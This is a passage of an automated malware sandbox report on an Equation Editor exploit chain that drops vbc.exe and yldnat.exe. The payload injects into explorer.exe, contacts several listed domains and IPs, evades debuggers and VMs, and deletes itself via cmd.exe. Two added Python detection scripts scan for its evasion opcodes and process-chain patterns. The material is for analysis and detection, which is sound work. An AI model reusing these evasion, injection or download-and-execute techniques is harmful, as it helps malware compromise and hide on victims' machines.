Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EADFA1 push ecx; ret 8_2_01EADFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012F1B1 push esi; retf 8_2_0012F1B2
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012D5D5 push eax; ret 8_2_0012D628
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012D622 push eax; ret 8_2_0012D628
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012D62B push eax; ret 8_2_0012D692
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012D68C push eax; ret 8_2_0012D692
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E79A push dword ptr [2E33947Ah]; ret 8_2_0012E9FB
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E9FF push dword ptr [2E33947Ah]; ret 8_2_0012E9FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\yldnat.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_013B1890
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wuapp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe RDTSC instruction interceptor: First address: 0000000000408BB4 second address: 0000000000408BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe RDTSC instruction interceptor: First address: 0000000000408F3E second address: 0000000000408F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 0000000000118BB4 second address: 0000000000118BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 0000000000118F3E second address: 0000000000118F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1500 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wuapp.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00408E70 rdtsc 6_2_00408E70
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: EQNEDT32.EXE, 00000002.00000002.971587463.000000000069F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.995482654.0000000000964000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000
Source: explorer.exe, 00000007.00000000.1002709372.000000000037B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000007.00000000.995370512.0000000004423000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e
Source: explorer.exe, 00000007.00000000.995128220.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B1D2C _memset,IsDebuggerPresent, 5_2_013B1D2C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_013B558A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B1D17 GetProcessHeap, 5_2_013B1D17
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00408E70 rdtsc 6_2_00408E70
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036D0559 mov edx, dword ptr fs:[00000030h] 2_2_036D0559
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h] 5_2_001103F8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h] 5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h] 5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h] 5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h] 5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008726F8 mov eax, dword ptr fs:[00000030h] 6_2_008726F8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB26F8 mov eax, dword ptr fs:[00000030h] 8_2_01EB26F8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0040A0E0 LdrLoadDll, 6_2_0040A0E0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B439B SetUnhandledExceptionFilter, 5_2_013B439B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_013B43CC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B439B SetUnhandledExceptionFilter, 6_2_013B439B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_013B43CC
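The two evasion signatures above that matter most to an analyst are the RDTSC pairs (two `rdtsc` reads six bytes apart, bracketing `xor ecx, ecx; add ecx, eax`, so the delta can be compared with a threshold that a hypervisor's trapped or offset TSC exceeds) and the `mov r32, dword ptr fs:[00000030h]` loads, which fetch the PEB where `BeingDebugged` and `NumberOfProcessors` live; that is the "GetPEB, DecisionNodes, ExitProcess" chain. The sandbox finds these at runtime with an instruction interceptor; the following is an added static counterpart, written for this page and not part of the report or Joe Sandbox. It matches the x86 encodings of those instructions in a raw code buffer. The buffer is constructed: the two RDTSC windows are placed at file offsets that reproduce the report's addresses 0x408BB4 and 0x408F3E under an assumed image base of 0x400000, and the two PEB reads are at offsets chosen for the example.

```python
"""Opcode-pattern scan for the anti-analysis instructions the report flags.

Added illustration, not part of the sandbox report or its tooling. Image base
and the placement of the sequences in the sample buffer are assumptions.
"""
import re

IMAGE_BASE = 0x400000  # assumed; the report's yldnat.exe addresses are 0x408xxx

RDTSC = b"\x0f\x31"
# mov eax, fs:[30h] as moffs32 (64 A1 30 00 00 00), or any
# mov r32, fs:[30h] with a ModRM disp32 operand (64 8B /r, mod=00, rm=101).
PEB_READ = re.compile(
    rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00"
)
REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")


def find_rdtsc_pairs(buf: bytes, max_gap: int = 16):
    """Return (first_va, second_va) for rdtsc instructions within max_gap bytes.

    Two nearby reads bracket a short instruction window; the delta between
    them is what the timing check compares against a threshold.
    """
    offsets = [m.start() for m in re.finditer(re.escape(RDTSC), buf)]
    return [(IMAGE_BASE + a, IMAGE_BASE + b)
            for a, b in zip(offsets, offsets[1:]) if b - a <= max_gap]


def find_peb_reads(buf: bytes):
    """Return (va, destination register) for each 32-bit load from fs:[30h]."""
    hits = []
    for m in PEB_READ.finditer(buf):
        enc = m.group(0)
        # A1 form always targets eax; otherwise the ModRM reg field names it.
        reg = "eax" if enc[1] == 0xA1 else REG32[(enc[2] >> 3) & 7]
        hits.append((IMAGE_BASE + m.start(), reg))
    return hits


def build_sample() -> bytes:
    """Constructed code buffer carrying the sequences quoted in the report."""
    buf = bytearray(b"\xcc" * 0x9000)  # int3 filler
    # rdtsc ; xor ecx, ecx ; add ecx, eax ; rdtsc  (the report's 6-byte window)
    timing = RDTSC + b"\x31\xc9" + b"\x01\xc1" + RDTSC
    buf[0x8BB4:0x8BB4 + len(timing)] = timing
    buf[0x8F3E:0x8F3E + len(timing)] = timing
    buf[0x03F8:0x03F8 + 6] = b"\x64\xa1\x30\x00\x00\x00"      # mov eax, fs:[30h]
    buf[0x0559:0x0559 + 7] = b"\x64\x8b\x15\x30\x00\x00\x00"  # mov edx, fs:[30h]
    return bytes(buf)


if __name__ == "__main__":
    code = build_sample()
    for first, second in find_rdtsc_pairs(code):
        print(f"RDTSC pair: first address {first:016X} second address {second:016X}")
    for va, reg in find_peb_reads(code):
        print(f"{va:08X} mov {reg}, dword ptr fs:[00000030h]")
```

Matching opcodes in raw bytes without disassembling is the same trade-off a YARA rule makes: `0F 31` and `64 A1` can occur inside immediates or data, so treat a hit as a triage lead and confirm it in a disassembler or, as the report does, by intercepting the instruction at runtime. The pair distance is the useful discriminator: legitimate profiling code rarely issues two `rdtsc` within a handful of bytes.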

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 23.81.214.26 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe Network Connect: 164.155.217.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.212 80 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 8E0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Memory written: C:\Users\user\AppData\Local\Temp\yldnat.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Thread register set: target process: 1860 Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Thread register set: target process: 1860 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe" Jump to behavior
Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B3283 cpuid 5_2_013B3283
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_013B3EC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
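The four "Process created" lines in this section describe the whole chain: Equation Editor (EQNEDT32.EXE) starts a dropped vbc.exe from C:\Users\Public, vbc.exe starts yldnat.exe from the user's Temp directory, yldnat.exe re-executes itself, and, after injection, wuapp.exe runs cmd.exe to delete the original yldnat.exe. Each link is detectable from process-creation telemetry alone. The following is an added hunting example written for this page, not part of the report or of Joe Sandbox; it parses the report's own lines (copied verbatim) and applies four parent/child rules. The staging-directory list and the rule wording are my assumptions.

```python
"""Parent/child hunting rules run over the report's own "Process created" lines.

Added illustration, not part of the sandbox report or its tooling. The four
input lines are copied verbatim from the report; the parser, the rules and
the STAGING_DIRS list are assumptions about what a hunter would flag.
"""
import ntpath
import re
from dataclasses import dataclass

REPORT_LINES = [
    r'Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior',
    r'Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna Jump to behavior',
    r'Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe" Jump to behavior',
]

# "Source: <parent> Process created: <image> <command line> Jump to behavior"
LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+)"
    r"(?: (?P<cmdline>.*?))?(?: Jump to behavior)?$"
)
STAGING_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")  # assumed
DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?\.exe)"?', re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


def parse_report(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append(ProcessEvent(m["parent"], m["image"], m["cmdline"] or ""))
    return events


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_equation_editor_child(ev, seen):
    # Equation Editor has no reason to start programs; a child process is the
    # post-exploitation pattern of CVE-2017-11882 / CVE-2018-0802.
    if _name(ev.parent) == "eqnedt32.exe":
        return "EQNEDT32.EXE spawned a child process"


def rule_staging_dir_exec(ev, seen):
    img = ev.image.lower()
    if img.endswith(".exe") and any(d in img for d in STAGING_DIRS):
        return "executable started from a user-writable staging directory"


def rule_self_reexec(ev, seen):
    # A binary launching a second copy of itself with the same command line is
    # a common unpacking stage before injection into another process.
    if ev.parent.lower() == ev.image.lower():
        return "process re-executed its own image (unpacking stage)"


def rule_deletes_earlier_payload(ev, seen):
    if _name(ev.image) != "cmd.exe":
        return None
    m = DEL_RE.search(ev.cmdline)
    if m and m.group(1).lower() in seen:
        return "cmd.exe deleting an executable that ran earlier in the chain"


RULES = [rule_equation_editor_child, rule_staging_dir_exec,
         rule_self_reexec, rule_deletes_earlier_payload]


def evaluate(events):
    """Return (image name, finding) pairs; `seen` tracks images already run."""
    findings = []
    seen = set()
    for ev in events:
        for rule in RULES:
            msg = rule(ev, seen)
            if msg:
                findings.append((_name(ev.image), msg))
        seen.add(ev.image.lower())
    return findings


if __name__ == "__main__":
    for image, msg in evaluate(parse_report(REPORT_LINES)):
        print(f"{image}: {msg}")
```

The same rules transfer directly to Sysmon Event ID 1 or EDR process-start data, where ParentImage, Image and CommandLine carry the fields parsed here. The delete rule is the one worth correlating across events: a `cmd.exe /c del` of a path that some earlier event executed is a much stronger signal than either event alone, and it is the final step of this chain rather than the first, so it confirms rather than prevents. Blocking EQNEDT32.EXE from creating child processes (an Attack Surface Reduction rule covers exactly this) would have cut the chain at its first link.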

Stealing of Sensitive Information

Source: Yara match File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
